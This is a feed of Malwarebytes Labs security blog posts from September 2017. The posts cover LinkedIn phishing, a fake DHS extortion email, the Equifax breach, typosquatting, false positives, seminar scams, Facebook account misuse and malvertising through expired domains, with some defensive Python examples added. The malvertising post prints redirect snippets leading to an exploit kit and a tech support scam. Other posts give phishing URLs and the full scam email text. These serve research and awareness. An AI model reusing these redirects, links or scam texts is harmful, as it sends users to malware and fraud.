Techie Feeds

Compromised LinkedIn accounts used to send phishing links via private message and InMail

Malwarebytes - Tue, 09/12/2017 - 17:24

Phishing continues to be a favorite of criminals for harvesting user credentials, using more or less sophisticated social engineering tricks. In this post, we take a look at a recent attack that uses existing LinkedIn user accounts to send phishing links to their contacts via private message but also to external members via email.

What makes this campaign interesting is the abuse of long standing and trusted accounts that were hacked, including Premium membership accounts that have the ability to contact other LinkedIn users (even if they aren’t a direct contact) via the InMail feature. The fraudulent message includes a reference to a shared document and a link that redirects to a phishing site for Gmail and other email providers which require potential victims to log in.

Those who proceed will have their username, password, and phone number stolen but won’t realize they were duped right away. Indeed, this phishing scam ends on a tricky note with a decoy document on wealth management from Wells Fargo.

Private message

This message was received from a trusted and existing contact, although the time stamp is showing 12:17 AM, which is perhaps one of the red flags to be noted. The message talks about a shared Google Doc and gives a link to it, via the Ow.ly URL shortener.

Figure 1: An instant message from a contact directing to a phishing scam

Behind the shortened URL redirection

URL shorteners are a well-known vehicle for spreading malware and phishing scams but they are also used for legitimate purposes, especially on social media where long URLs tend to be too cumbersome. In this attack, the perpetrators are abusing both ow.ly and a free hosting provider (gdk.mx) to redirect to the phishing page, itself hosted on a hacked website.

Figure 2: The redirection flow behind this phish

Phishing for email credentials

This particular page is built as a Gmail phish, but will also ask for Yahoo or AOL user names and passwords. The main page is followed by an additional request for a phone number or secondary email address and ultimately the user sees a decoy Wells Fargo document hosted on Google Docs.

Figure 3: The phishing template, harvesting credentials and showing decoy content

InMail

Attackers are also abusing LinkedIn’s trusted InMail feature to send the same phishing link. As per LinkedIn, “InMail messages are sent directly to another LinkedIn member you’re not connected to.” This is an interesting aspect since it opens up the scope of the attack not only to the compromised account’s own contacts but also to other users.

This email was sent via LinkedIn and had a custom ‘Security Footer’. LinkedIn will send messages “that include a security footer message with your name and professional headline to help you distinguish authentic LinkedIn emails from “phishing” email messages”, although it does point out that this is no guarantee that the email is legitimate. In other words, the delivery method is to be trusted, but the content may not be. The same can be said for phishing pages that use HTTPS – which is the case here – making content delivery secure but the content itself fraudulent.

Figure 4: The phishing email received via LinkedIn that includes the ‘Security Footer’

However, there’s a caveat here. To use InMail, you need a Premium account which comes at a hefty monthly cost. There’s a good article by KnowBe4 detailing a phishing attack using LinkedIn’s own platform via InMail. The researchers showed how trivial it is to create a free account, start connecting with people, and finally upgrade to a Premium account in order to start sending scams via InMail. But the conclusion of their research is that this particular attack would not scale well due to limited InMail credits, making the operation way too expensive.

This limitation does not apply here though since the crooks are not creating (and paying for) their own accounts, but rather leveraging existing ones. Therefore, they have little to worry about burning free credits and tarnishing their victim’s reputation so long as it allows them to deliver their payload far and wide.

Personal security and its implications

We do not know how (malware, other phishing attacks, etc.) or how many LinkedIn accounts were compromised in this campaign. It’s also unclear whether the shortened URLs are unique per hacked account or not, although we think they might be. The user whose account was hacked had over 500 connections on LinkedIn and based on Hootsuite’s stats, we know 256 people clicked on the phishing link.

Figure 5: A Premium member account with 500+ connections caught sending phishing link

This kind of attack via social media is not new – we have seen hacked Skype or Facebook accounts send spam – but it reminds us of how much more difficult it is to block malicious activity when it comes from long standing and trusted user accounts, not to mention work acquaintances or relatives. This also makes such attacks more credible to potential victims and can lead to a snowball effect when victims become purveyors of phishing links themselves.

If your LinkedIn account gets compromised, you should immediately review its settings to change your password and enable two-step verification (instructions here). Additionally, you can post a quick update on your timeline that lets your contacts know you were hacked and that any previous message you may have sent with links should be carefully vetted.

We’d like to thank @acfou for sharing a sample of this campaign with us.

Indicators of compromise

Phishing message:

I have just shared a document with you using GoogleDoc Drive, View shared document http://ow.ly/[]

Redirection and phishing page:

ow[.]ly/qmxf30eWLyN
dgocs[.]gdk.mx/new/index.php
dgocs[.]gdk.mx/new/index.php?i=1
cakrabuanacsbali[.]com/wp-rxz/index.php

Decoy Google Docs Wells Fargo file:

docs.google.com/document/d/13qUEngtHuKjtvGoPaMl3x6cEnT2oO6lSWOccM-PkXKk/edit

The post Compromised LinkedIn accounts used to send phishing links via private message and InMail appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (September 4 – September 10)

Malwarebytes - Mon, 09/11/2017 - 19:53

Last week, we looked into expired domain names being used for malvertising, delved into dubious Facebook apps, and checked out Chinese seminar scams. We also explained the whys and wherefores of false positives, explained what Google is doing with HTTPs, warned you away from a fake DHS email, and outlined some early information about the Equifax breach.


Stay safe!

Malwarebytes Lab Team

The post A week in security (September 4 – September 10) appeared first on Malwarebytes Labs.


Fake DHS email – “Give us $350 in the next 24 hours”

Malwarebytes - Fri, 09/08/2017 - 15:00

Who likes threats?

Nobody, as it turns out. That hasn’t stopped scammers from jumping on the menacing email train – next stop, your inbox.

Every now and then, we see the 419 “Hitman deployed to kill you” missive doing the rounds. On a similar threatening note, we have a fake DHS notification telling you to pay a $350 fee within 24 hours – or else.

The email reads as follows (we’ve put the meatiest threats in bolded text):

Attention:

You are to contact the U.S. Department of Homeland Security (DHS) Washington, D.C to obtain your Clearance Certificate, find below their contact information:

Contact Person: Stevan Bunnell
General Counsel
U.S. Department of Homeland Security (DHS)
Washington DC Mailing Address U.S. Department of Homeland Security Washington, D.C. 20528.

Ensure you contact (DHS) with your Full Name, Address and phone number/cell number.
Contact the DHS via Email with the information above immediately, once you contact them I will get back to you or else I will have an agent come visit you at home for questioning.

Furthermore, be advised that according to the United State Law together with the Federal Bureau of Investigation rules and regulations, you are to obtain the document from the DHS. Also note that you are to take care of the cost of the Clearance Certificate, which will be issued in your name. Due to the content of the Clearance Certificate and how important and secured the document is, you as the beneficiary will send the DHS the sum of $350 Dollars only for the issuing of the Clearance Certificate. That is the lay down rules for the DHS to release such sensitive document; DHS will issue you the authentic and original copy of the Clearance Certificate with a seal on it for verification and approval.

You are hereby advised to Contact them through the email address above to make an inquiry concerning how you will send the official fee to them. Note that you are to observe this immediately, if you really want your funds to be credited to your personal bank account and to avoid any legal battle with the security operatives over this matter. We have already informed the DHS about the present situation go ahead and contact them immediately.
Your funds are under our custody and will not be released to you unless the required document is confirmed, after that the fund will be release to you immediately without any delay.

NOTE: We have asked for the above document to make available the most completed and up-to date records possible for no criminal justice purposes. The documents will clarify the intensity of this fund; exonerate it from money laundry, scam and terrorism.

WARNING: Failure to provide the above requirement in the next 24 hours, legal action will be taken immediately by arresting and detaining you as soon as international court of justice issues a warrant of arrest, if you are found guilty, you will be jailed as terrorism, drug trafficking and money laundering is a serious problem in our community today and the world at large. The F.B.I will not stop at any length in tracking down and prosecuting any criminal who indulges in this criminal act. Nobody is above the law and the law is not a respecter of anybody. We presume you are law abiding and would not want to have scuffles with the authority, in and outside of the United States.

We are charged with the responsibility of implementing legal norms and our authority is irrevocable so don’t dare dispute our instruction, just act as instructed. The person you know will not help you in this matter rather abide by this instruction.

Note: You are to contact DHS with your full names, phone number/cell number and full address via the email which I stated above immediately, for the processing of your Clearance Certificate within the next 48 hours.

Faithfully Yours
Thomas Dinapoli
Office of the New York State Comptroller

That’s quite the barrage of “pay up”, and could well scare some people into handing over whatever the scammers ask for (and we’d be surprised if they stop at the $350). Should you receive one of these emails, simply delete it and go on with your day – nobody is coming to collect money from you.

 

Christopher Boyd

The post Fake DHS email – “Give us $350 in the next 24 hours” appeared first on Malwarebytes Labs.


Equifax breach: What you need to know

Malwarebytes - Fri, 09/08/2017 - 07:02

On July 29, 2017, Equifax discovered that attackers had gained unauthorized access to private data belonging to an estimated 143 million Americans by exploiting a vulnerability in a website application. It is unknown at this point whether said vulnerability was a zero-day or had already been patched. The former would indicate that other companies could have also been attacked, while the latter would reflect on Equifax’s overall security posture.

According to Equifax, online criminals maintained their presence from mid-May through July 2017 and had access to:

  • Names
  • Social Security numbers
  • Birth dates
  • Addresses
  • Driver’s license numbers (in some cases)
  • Credit card numbers (for approx. 209,000 U.S. consumers)

It also said that some personal information for certain UK and Canadian residents was part of this breach.

This is obviously bad news for consumers and it will only increase the lack of trust they have towards corporations that collect and store their data. It also serves as a reminder that there are ways to be proactive and exercise your right to have access to your information and put certain restrictions in place to make identity theft harder.

Equifax is offering a free identity theft protection and credit file monitoring to all of its U.S. customers while still investigating the intrusion, working along with a private firm and law enforcement. More information about this breach and how to apply for ID theft protection can be found by going to equifaxsecurity2017.com, a website Equifax has just set up.

The post Equifax breach: What you need to know appeared first on Malwarebytes Labs.


Google reminds website owners to move to HTTPS before October deadline

Malwarebytes - Thu, 09/07/2017 - 15:36

With the release of Chrome v62 in less than 3 months, Google will begin marking non-HTTPS pages with text input fields—like contact forms and search bars—and all HTTP websites viewed in Incognito mode as “NOT SECURE” in the address bar. The company has started sending out warning emails to web owners in August as a follow-up to an announcement by Emily Schechter, Product Manager of Chrome Security Team, back in April.

Google began marking sites in Chrome v56, which was issued in January of this year. They targeted HTTP sites that collect user passwords and credit card details.

For owners to secure the information being shared among their visitors and their web server, they must start incorporating an SSL certificate. Failing to do this is risky for both parties: sites that allow the sending of information in clear text may also allow its exposure through the Internet.

Ms. Schechter also provided website owners with a handy guide on how to enable HTTPS on their servers. An additional guideline on how to avoid the “NOT SECURE” warning on Chrome is also available for web developers.

Looking at the way things are panning out, we can be confident that HTTPS will be the norm in no time. However, this doesn’t mean that all sites using SSL certificates can and should be trusted.

Google intended to separate phishing sites from legitimate ones with the marking of insecure sites, as Help Net Security noted in an article. Unfortunately, the introduction of new browser versions capable of flagging sites also promptly introduced more phishing sites using HTTPS. We’ve been seeing examples of this in the wild, as well, the latest of which was an Apple phishing campaign.

Discerning phishing pages from the real ones has become more challenging than ever. This is why it’s important for users to familiarize themselves with other signs that they might be on a phishing page apart from the lack of SSL certificates. Fortunately, users don’t have to look far from the address bar when they want to double-check that they’re on the right page before entering their credentials or banking details. Keep in mind the following when scrutinizing URLs and other elements around it:

  • Look for letters in the URL that may have been made to look like another letter or number, or there may be additional letters or numbers in the URL. For example, examplewebsite.com may appear as examplevvebsite.com—Catch that? The double ‘v’ together makes it look like the letter ‘w.’ This is an example of typosquatting. Here’s another example: examp1ewebsite.com—the ‘l’ in “example” is actually the number one.
  • Look for an Extended Validation Certificate (EV SSL). You know that a trusted website has this when you see a company name beside the URL, as you can see from the below UK Paypal address. Not all sites with SSL have this, unfortunately, but some of the trusted brands online already use EV SSL, such as Bank of America, eBay, Apple, and Microsoft.
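
The URL checks in the list above can also be automated on the defender's side. The following is an added example, not code from the original post: it flags hosts that imitate a protected domain through look-alike characters or an extra character. The substitution table beyond "vv" and "1", the 'PROTECTED' list and the category names are assumptions made for the example.

```python
from urllib.parse import urlsplit

# Look-alike substitutions. "vv" for "w" and "1" for "l" are the two cases
# named in the text; "rn" for "m" and "0" for "o" are added assumptions.
CONFUSABLES = [("vv", "w"), ("rn", "m"), ("1", "l"), ("0", "o")]

# Domains we want to protect (taken from the article's own illustration).
PROTECTED = ["examplewebsite.com"]


def hostname(url_or_host):
    """Return the lower-case host from a URL or a bare host name."""
    text = url_or_host.strip()
    if "://" not in text:
        text = "//" + text
    return (urlsplit(text).hostname or "").lower()


def skeleton(host):
    """Collapse look-alike sequences so visually similar hosts compare equal."""
    for fake, real in CONFUSABLES:
        host = host.replace(fake, real)
    return host


def edit_distance(a, b):
    """Levenshtein distance, used to catch added or dropped characters."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(url_or_host, protected=PROTECTED):
    """Return (category, protected domain that was matched or imitated)."""
    host = hostname(url_or_host)
    for real in protected:
        # The real domain or one of its subdomains.
        if host == real or host.endswith("." + real):
            return ("exact", real)
    for real in protected:
        # Different string, same appearance once confusables are collapsed.
        if skeleton(host) == skeleton(real):
            return ("lookalike-characters", real)
    for real in protected:
        # One character added, dropped or swapped.
        if edit_distance(skeleton(host), skeleton(real)) <= 1:
            return ("extra-or-missing-character", real)
    return ("unrelated", None)


if __name__ == "__main__":
    for candidate in [
        "https://examplewebsite.com/login",
        "examplevvebsite.com",
        "http://examp1ewebsite.com/",
        "examplewebsites.com",
        "malwarebytes.com",
    ]:
        print(candidate, "->", classify(candidate))
```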

Lastly, be aware that phishers may use a free SSL certificate in their campaign to make it appear legitimate. They may also hijack sites that already have SSL in place, adding more to the veil of legitimacy they want to attain.


The Malwarebytes Labs

The post Google reminds website owners to move to HTTPS before October deadline appeared first on Malwarebytes Labs.


Explained: False positives

Malwarebytes - Thu, 09/07/2017 - 15:00

What are false positives?

False positive, which is sometimes written as f/p, is an expression commonly used in cybersecurity to denote that a file or setting has been flagged as malicious when it’s not.

In statistics, false positives are called Type I errors, because they check for a particular condition and wrongly give an affirmative (positive) decision. The opposite of this is a false negative, or Type II error, which wrongly concludes that a particular condition is not true when, in fact, it is. In this blog post, we will focus on false positives in cybersecurity, but note that false negatives in this field are commonly referred to as “misses.” So “misses” are malicious files or malicious behavior that the scanner or protection software did not detect.

Possible causes of false positives

The most common causes of false positives are:

  • Heuristics: decisions are made on minimal bits of information
  • Behavioral analysis: decisions are made based on behavior, and the legitimate file shows behavior that is usually considered malicious
  • Machine learning: sometimes we see the effects of “garbage in, garbage out,” or more politely put, “training did not take certain situations into account.”

Let’s give some examples of these causes.

An example rule for a heuristic detection could be this: if this file claims to be from Microsoft, but it is not signed with the Microsoft certificate, then we assume the file has malicious intentions. A false positive could occur in the rare case that Microsoft forgot to sign the file.

One detection vector in spotting the behavior of ransomware is if a program starts deleting shadow copies. Some ransomware families do this to ensure the victim has no backups. But you can imagine a cleanup utility that deletes old shadow copies, which could possibly be flagged as displaying malicious activity, right?

Machine learning is done by feeding the system vast amounts of training data. Mistakes or ambiguities in the training data can lead to errors in the detections.

Designing detection rules for yet-unknown malicious files or behavior is always a balance of trying to cover as many of them as possible without triggering any false positives and, understandably, this can go wrong sometimes.
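
The balance described above can be made concrete with the two example rules from this section. This is an added example, not Malwarebytes code: the sample set, file names and vendor strings are constructed, and the rules are simplified to one boolean check each.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Sample:
    name: str
    claimed_vendor: str          # vendor named in the file's version info
    signer: Optional[str]        # subject of a valid signature, None if unsigned
    deletes_shadow_copies: bool  # observed behavior
    malicious: bool              # ground truth, known because the set is constructed


# Constructed sample set, not real telemetry.
SAMPLES = [
    Sample("ransomware.exe", "Microsoft", None, True, True),
    Sample("unsigned_ms_tool.exe", "Microsoft", None, False, False),
    Sample("backup_cleanup.exe", "Contoso", "Contoso", True, False),
    Sample("notepad.exe", "Microsoft", "Microsoft", False, False),
    Sample("quiet_stealer.exe", "Contoso", None, False, True),
    Sample("editor.exe", "Contoso", "Contoso", False, False),
]


def vendor_mismatch(s):
    """Heuristic rule: claims to be from Microsoft but is not signed by Microsoft."""
    return s.claimed_vendor == "Microsoft" and s.signer != "Microsoft"


def shadow_copy_deletion(s):
    """Behavioral rule: the program deletes shadow copies."""
    return s.deletes_shadow_copies


def either(s):
    """Broad coverage: flag when any rule fires."""
    return vendor_mismatch(s) or shadow_copy_deletion(s)


def both(s):
    """Strict: flag only when the heuristic and the behavior agree."""
    return vendor_mismatch(s) and shadow_copy_deletion(s)


def score(rule, samples):
    """Sort sample names into true/false positives and negatives for one rule."""
    result = {"tp": [], "fp": [], "fn": [], "tn": []}
    for s in samples:
        flagged = rule(s)
        if flagged and s.malicious:
            key = "tp"
        elif flagged:
            key = "fp"   # false positive: benign file flagged
        elif s.malicious:
            key = "fn"   # false negative, a "miss"
        else:
            key = "tn"
        result[key].append(s.name)
    return result


def false_positive_rate(result):
    """Share of benign samples that were flagged."""
    benign = len(result["fp"]) + len(result["tn"])
    return len(result["fp"]) / benign if benign else 0.0


if __name__ == "__main__":
    for rule in (vendor_mismatch, shadow_copy_deletion, either, both):
        r = score(rule, SAMPLES)
        print(f"{rule.__name__:22} FP={r['fp']} misses={r['fn']} "
              f"FPR={false_positive_rate(r):.2f}")
```

On this set, combining the rules with "or" doubles the false positives without catching the missed sample, while requiring both removes the false positives and still catches the ransomware.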

Fun facts

A much less common cause for false detections is deliberate false positives. The most well-known false positive is the EICAR test file, a computer file that was developed by the European Institute for Computer Antivirus Research to verify the response of antivirus programs without having to use real malware. Note that Malwarebytes for Windows does not detect the EICAR file and Malwarebytes for Mac only detects it under exceptional circumstances. This is by design.

But history has also brought us deliberate false positives as a way to test if an anti-malware software is using detections made by their competitors.

Summary

False positives are alarms for non-specific files or behavior that are flagged as malicious, while in fact there were no bad intentions present. They are caused by rules that try to catch as many malicious events as possible, which sometimes fail by picking up something legitimate.

 

Pieter Arntz

The post Explained: False positives appeared first on Malwarebytes Labs.


Nigerian scams without the Nigerians

Malwarebytes - Wed, 09/06/2017 - 23:00

Users in English speaking countries are quite familiar with the Nigerian scam: an important guy in Nigeria needs your help getting his money out of the country and if you assist with some transaction fees, a chunk of his fortune could be yours. But what about non-English speaking countries? What forms the baseline level of internet crap? Today we’re going to look at the Chinese version – the seminar scam.

Step 1: the pitch

This is actually more common via SMS, presumably due to limited mobile spam tools. The subject line will reference upcoming training for generic business skills like project management, book keeping, or HR.

Project Leadership Summary: come learn on August 23-24, “Project Leadership”

This particular message we received is advertising a “project leadership” seminar.

These pitches vary in topic, generally staying around vague business topics and are so common that almost any Chinese internet user is likely to see one eventually. The provided mobile number doesn’t show any results besides more spam and the QQ isn’t registered to any notable groups. Generally, the accounts associated with these emails are used exclusively for the scam.

Step 2: the form

Naturally, we want to attend said seminar, so we sent a response asking how to register. Within a day, the scammer responded:

He’s referencing a file that has a detailed agenda, as well as registration info. He also wants our Weixin, so that we can “maintain a long-term relationship.”

The attached, clean file includes a “registration form” requiring the following:

  • Company name, address, and bank with account number
  • Attendee’s name, phone number, and email addresses.

This is the point where generic business spam begins to edge closer to malicious. Scammers will take the target’s money, and PII as well for use in further scams. Should a user actually fill this out, they will be signed up for every spammer’s list in perpetuity.

Step 3: the payment

Just in case we were wondering about receipts, the form lets us know that we can pick up our tickets the day of the “training,” and then provides a bank account that we can wire money directly to.

Given that we didn’t pay the guy and we did not go to Shanghai to check out the “venue”, there’s still a possibility that this may be legit. That said:

  • We responded from a free Chinese webmail, offering no company affiliation. This did not faze the scammer.
  • There are estimates that up to 40% of Chinese private educational institutions (training centers, job skills, etc.) are unlicensed and/or fraudulent.
  • The price of this training is 1800 yuan, which makes up a significant portion of the average Chinese monthly wage of 2300 yuan.

The odds are fairly good that there either isn’t any training, or the venue specified actually hosts a pyramid scheme that will train members on how to recruit new marks. Much like a Nigerian scam, this form of advance fee fraud is very common and familiar. Its familiarity is actually a plus, as anyone who responds to such an obvious pitch more or less preselects themselves as a vulnerable and easily manipulated target. And similar to the 419 scam’s exploitation of underdeveloped financial institutions in Nigeria, the seminar scam exploits a void in regulation in the Chinese adult education market. Seminar scams are a great reminder that regardless of the language or culture used, scammers will exploit the same weaknesses online, wherever they are.

Conclusion

So how do you defend yourself against seminar scams? First, don’t respond to the email and definitely don’t disclose any personal information. But also ask yourself, “Have I heard of this institution? Does it have a local reputation?” As well as “What reputable organization advertises in this way?” Probably not too many. Stay safe: be vigilant.

The post Nigerian scams without the Nigerians appeared first on Malwarebytes Labs.


Facebook worries: I didn’t post that

Malwarebytes - Wed, 09/06/2017 - 15:00

It is my assumption that most Facebook users don’t look at their own profile often. With your own profile, I mean the timeline that shows up when you click your own name or avatar in the Facebook menu.

That’s because we think we know exactly what is posted there, so why bother to look at it? After all, isn’t that supposed to be all the stuff that we posted ourselves?

The feeling of disorientation you get when you find something you are sure you didn’t post will be even worse if you notice that supposed messages have been sent from your Facebook Messenger account that you know you never sent. All in all, there might be some discrepancies between what you did and what actually shows up and that’s what this blog post is all about.

How do posts end up on your timeline that you didn’t post?

There are three main reasons that might be of some concern:

  1. Someone or something else has access to your Facebook account
  2. A Facebook app has the authorization to post on your timeline
  3. An active script or browser extension can post on your behalf

In all these cases, there is no immediate reason to worry as long as you know about it and trust the person, app, script, or extension that has access or authorization.

Authorized apps

We have seen it in the past and I bet there are still active apps being spread among Facebook users by pretending to be spectacular videos. You may remember the “Man found inside Shark” and similar sensational posts, which try to trick you into downloading malware or installing a malicious app.

To check whether an app has the ability to post on your timeline, click on Settings:

On the left-hand side, click on Apps and select any app that doesn’t look familiar or trustworthy. You can see whether they can post on your timeline by looking at their permissions. If they have the authorization to post on your timeline, it will look like this:

Delete apps you don’t trust or no longer use by clicking on the X that shows up when you hover over an app with your mouse pointer in the Apps menu.

Scripts posting on your behalf

It is possible there is an active script (or program) that uses your credentials when you have Facebook opened in your browser. The script does not need to log in, but simply makes use of the fact that you already did log in. It doesn’t matter whether you did that actively or whether you relied on a cookie set in an earlier session.

These scripts can be hiding in your browser cache or in the shortcut that you use to open Facebook. You can find localized and browser-specific help on clearing your cache on this Facebook Help page for several browsers. You can circumvent using your shortcuts if you suspect they have been altered by typing facebook.com in your browser’s address bar. Once you are sure the shortcuts have been altered, you can find methods on how to clean your browser shortcuts on our forums.

Browser extensions could be responsible for similar behavior. They can be removed following these procedures:

  • Internet Explorer: Tools (gear icon) > Manage add-ons > Toolbars and Extensions > Select the one(s) you don’t trust one by one and click “Disable”
  • Firefox: Menu (horizontal stripes) > Add-ons > click on “Disable” behind the ones you don’t trust or don’t recall installing.
  • Chrome: Menu (3 dots) > More Tools > Extensions > Uncheck “Enabled” behind the ones you don’t trust or don’t recall installing.
  • Opera: click the Opera icon > Extensions > Extension Manager > click on Disable below the ones you don’t trust or don’t recall installing.

Stolen credentials

I’m posting about this as the last option for a reason: the advice that we give you here does not only apply to the cases where you know that someone or something you didn’t authorize posted on your behalf. If you have experienced or suspected that something or someone has been posting without your knowledge, including through one of the other options (scripts, rogue apps), we recommend that you change your password and enable 2FA, if you haven’t already. Even if you have no idea who might have been responsible, we recommend you lock them out before they abuse their access to your account even further. We also recommend doing this even if you found out which app or other method was used, and even if you successfully removed the culprit. Keep in mind that the same app or script might have harvested your login credentials and sent them to the threat actors.

Summary

What to do when you find posts in your name on Facebook which you did not post:

  1. Try to find out if there is a suspicious or unsolicited Facebook app active on your list that has posting authorization.
  2. Clear the cache of the browser that you use to access Facebook and the shortcuts you use to open Facebook.
  3. Change your password and consider enabling 2FA.

 


Pieter Arntz

The post Facebook worries: I didn’t post that appeared first on Malwarebytes Labs.


Expired domain names and malvertising

Malwarebytes - Tue, 09/05/2017 - 15:00

In Q1 and Q2 of 2017, we noticed a sharp decline in drive-by downloads coming from compromised websites. The campaigns of the past are either gone (Pseudo Darkleech) or have changed focus (EITest using social engineering techniques).

Malvertising – which has remained steady and is currently the main driving force behind some of the most common malware and scam distribution operations – not only stems from various publishers but also from ‘abandoned’ websites. Those related domains once served a legitimate purpose but were never renewed by their owners and fell into the hands of actors looking to make a quick profit using questionable practices.

In this post, we take a look at how malicious redirections from expired domains work and what kind of traffic they lead to.

The life, death, and resurrection of a domain name

Most issues when it comes to web security don’t usually come from the platforms themselves but from the people that run them or from properties that have simply been relinquished. The folks over at Sucuri have written about this extensively and in a recent post, they showed how expired domains and outdated plugins in popular CMS were a deadly mix, resulting in malicious redirects.

Here is an example of a website, oezelotel[.]com first registered to denizduezguen@yahoo.de on 03/10/2014, that once was advertising various hotels, was wiped in 2016, and eventually got parked as its domain name registration was never renewed.

Figure 1: Evolution of a website over time and its eventual expired domain name

New owner, clear motive

A historical whois on the parked domain courtesy of Hyas’ Comox shows that on June 4, 2017, the domain name changed hands from its original owner to domainmanagers@outlook.com. This is also when the site changed hosting (moving from a Germany based server to a US one) and began exhibiting its malicious behavior.

A cursory review of some other properties owned by the same registrant indicates a penchant for going after expired domains and monetizing them via dubious ad networks. DomainTools has over 23 K records belonging to that same email address.

Malvertising roulette

You might think a non-existent site is harmless but this couldn’t be further from the truth. Abandoned or forgotten domains are often registered and ‘parked’ to generate low-quality traffic (i.e. spammy links) as described in yet another blog post from Sucuri, and it is a real – lucrative – business model.

We observed different types of traffic, ranging from bogus surveys to more nefarious activity such as drive-by attacks and tech support scams, based on a visitor’s user agent. Note that the following examples did not require users to click on any link, the simple fact of visiting the site triggered an automatic redirection.

RIG EK Flow:

Figure 2: RIG exploit kit infection chain via the Fobos campaign that delivers the Bunitu Trojan.

oezelotel[.]com (parked site) -> xml1.limeclick[.]com

<html><head><title>Loading</title></head>
<body><script>location.href='http://xml1.limeclick[.]com/click?i=SXRzS*SmiP4_0';</script></body></html>

xml1.limeclick[.]com -> bingfreegames3[.]info

<iframe frameborder='0' id='291733' src='http://212kjhguihkhbvd[.]cf/ssl/index.php?ps=49506017476' width='313' height='313' dir='0' ></iframe>

212kjhguihkhbvd[.]cf -> 188.225.27.234 (RIG EK landing)

<iframe id="91130118" width=278 double="1" height=278 src="http://188.225.27[.]234/?NTkwNTc2&mano={redacted}" > </iframe>

Tech Support Scam (TSS) flow:

Figure 3: Redirection to tech support scam via blobar[.]org

oezelotel[.]com (parked site) -> bougainvillaeabuffeting[.]com

<html><head><title>Loading</title></head>
<body><script>location.href='http://bougainvillaeabuffeting[.]com/d/
r5t9b73131?rtb={redacted}&subid=oezelotel.com';</script></body></html>

bougainvillaeabuffeting[.]com -> blobar[.]org

document.write('<META http-equiv="refresh" content="0;url='+u+'">');
</SCRIPT><NOSCRIPT><META http-equiv="refresh" content="0;url=
https://blobar.org/d/0&rtb={redacted}&subid=oezelotel.com&r=
http%3A%2F%2Foezelotel.com%2F"></NOSCRIPT>
<META name="referrer" content="no-referrer">

blobar[.]org -> www.alrtsyscalling[.]cf (TSS landing)

Location: https://www.alrtsyscalling[.]cf/call-microsoft-support-at-1-855-633-1666

Figure 4: Browser locker serving a tech support scam page (IP address is hard coded in picture)
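The two flows above chain four click-free redirect mechanisms: a script assigning location.href, an iframe, a meta refresh and an HTTP Location header. The following is an added example, not code from the original post, that rebuilds such a chain from captured responses for triage; the capture is constructed and uses reserved example domains, and the function names are hypothetical.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Script navigation to a string literal, e.g. location.href='http://...'
JS_NAV = re.compile(
    r"""(?:\b(?:window|document|top|self)\.)?\blocation(?:\.href)?\s*=\s*(['"])(.+?)\1""",
    re.I | re.S)
# The url=... part of a meta refresh "content" attribute
META_URL = re.compile(r"""url\s*=\s*['"]?([^'"]+)""", re.I)


class AutoNavFinder(HTMLParser):
    """Collects navigations that fire without any user click."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.found = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
        elif tag in ("iframe", "frame") and a.get("src"):
            self.found.append(("iframe", a["src"]))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = META_URL.search(a.get("content", ""))
            if m:
                self.found.append(("meta-refresh", m.group(1)))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Only literal targets are recovered; URLs assembled at run time
        # (such as document.write with a variable) need a real browser.
        if self._in_script:
            for m in JS_NAV.finditer(data):
                self.found.append(("js-location", m.group(2)))


def next_hops(url, status, headers, body):
    """Return [(mechanism, absolute_url)] for one captured response."""
    hops = []
    location = {k.lower(): v for k, v in headers.items()}.get("location")
    if 300 <= status < 400 and location:
        hops.append(("http-redirect", urljoin(url, location.strip())))
    finder = AutoNavFinder()
    finder.feed(body)
    finder.close()
    for kind, target in finder.found:
        # Whitespace inside a captured URL is a wrapping artifact; drop it.
        hops.append((kind, urljoin(url, "".join(target.split()))))
    return hops


def trace(start, capture, max_depth=10):
    """Follow the first automatic hop of each response through the capture."""
    chain, seen, url = [], {start}, start
    for _ in range(max_depth):
        if url not in capture:
            break
        hops = next_hops(url, *capture[url])
        if not hops:
            break
        kind, target = hops[0]
        chain.append((urlsplit(url).hostname, kind, urlsplit(target).hostname))
        if target in seen:  # redirect loop
            break
        seen.add(target)
        url = target
    return chain


# Constructed capture: url -> (status, headers, body)
CAPTURE = {
    "http://parked.example/": (200, {},
        "<html><head><title>Loading</title></head><body><script>"
        "location.href='http://ads.example/click?i=abc';</script></body></html>"),
    "http://ads.example/click?i=abc": (200, {},
        "<script>var u='x';</script><noscript><meta http-equiv=\"refresh\" "
        "content=\"0;url=https://gate.example/d/0?r=1\"></noscript>"
        "<meta name=\"referrer\" content=\"no-referrer\">"),
    "https://gate.example/d/0?r=1": (302, {"Location": "https://mid.example/p"}, ""),
    "https://mid.example/p": (200, {},
        "<iframe id='1' width='1' height='1' src='http://192.0.2.10/ ?id=1'></iframe>"),
}

if __name__ == "__main__":
    for src, kind, dst in trace("http://parked.example/", CAPTURE):
        print(f"{src} -> {dst} ({kind})")
```
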

Traffic and user targeting

These days it seems irrelevant how malicious actors get their leads, so long as they are genuine users they can expose to malware or scams. An advantage of using ad networks and malvertising is that a lot of the filtering can be handled throughout the distribution chain, with remarkable efficiency, compared to server side checks on compromised sites.

Parked domains are one of many scenarios of hijacking traffic and monetizing it. While those practices raise eyebrows, are they actually illegal? Is it something that domain name registrars should enforce or ban? Those are interesting questions worth debating.

Malwarebytes blocks a lot of domains associated with malvertising as well as drive-by download attempts. Because we are witnessing more and more social engineering attacks, we highly recommend you spread the word about one of the most common scams today, the tech support scam.

The post Expired domain names and malvertising appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (August 28 – September 3)

Malwarebytes - Mon, 09/04/2017 - 17:00

Last week, we looked at what actions Kronos can perform in the final installment of a 2-part post. We also dived into Locky, again, a ransomware that just made a comeback, and found that its latest variant (as of this writing) has anti-sandboxing capabilities. This means that once Locky has determined that it’s residing in a virtual machine, it will not perform to its full functionality.

Our researchers also talked about a new 419 spam, malware vaccination tricks, malvertising, and insider threats.

